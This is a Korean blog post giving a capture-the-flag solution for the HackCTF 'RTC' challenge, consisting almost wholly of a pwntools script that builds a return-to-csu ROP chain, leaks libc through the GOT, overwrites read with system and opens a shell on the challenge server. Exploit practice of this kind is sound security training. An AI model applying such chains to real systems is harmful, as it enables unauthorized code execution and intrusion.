ii4gsp

HackCTF - RTC 본문

시스템 해킹/HackCTF

HackCTF - RTC

ii4gsp 2020. 5. 5. 23:05

 

 

 

 

from pwn import *

r = remote('ctf.j0n9hyun.xyz', 3025)
e = ELF('./rtc')
libc = ELF('./libc.so.6')

binsh = '/bin/sh\x00'
bss = e.bss()

stage0 = 0x00000000004006ba
stage1 = 0x00000000004006a0

def exploit(addr, arg1, arg2, arg3):
    payload = ''
    payload += p64(0)
    payload += p64(1)
    payload += p64(addr)
    payload += p64(arg3)
    payload += p64(arg2)
    payload += p64(arg1)
    payload += p64(stage1)

    return payload

payload = ''
payload += '\x90' * 0x48
payload += p64(stage0)
payload += exploit(e.got['write'], 1, e.got['read'], 8)
payload += '\x90' * 8
payload += exploit(e.got['read'], 0, bss, len(binsh))
payload += '\x90' * 8
payload += exploit(e.got['read'], 0, e.got['read'], 8)
payload += '\x90' * 8
payload += exploit(e.got['read'], bss, 0, 0)

r.recvuntil('\n')
r.sendline(payload)

libc_base = u64(r.recv(8)) - libc.symbols['read']
system = libc_base + libc.symbols['system']

payload = ''
payload += binsh
payload += p64(system)

r.sendline(payload)

r.interactive()

'시스템 해킹 > HackCTF' 카테고리의 다른 글

HackCTF - Register  (0) 2020.11.27
HackCTF - Unexploitable #2  (0) 2020.11.26
HackCTF - SysROP  (0) 2020.05.05
HackCTF - Unexploitable #1  (0) 2020.05.05
HackCTF - You are silver  (0) 2020.03.05
'시스템 해킹/HackCTF' Related Articles more
Comments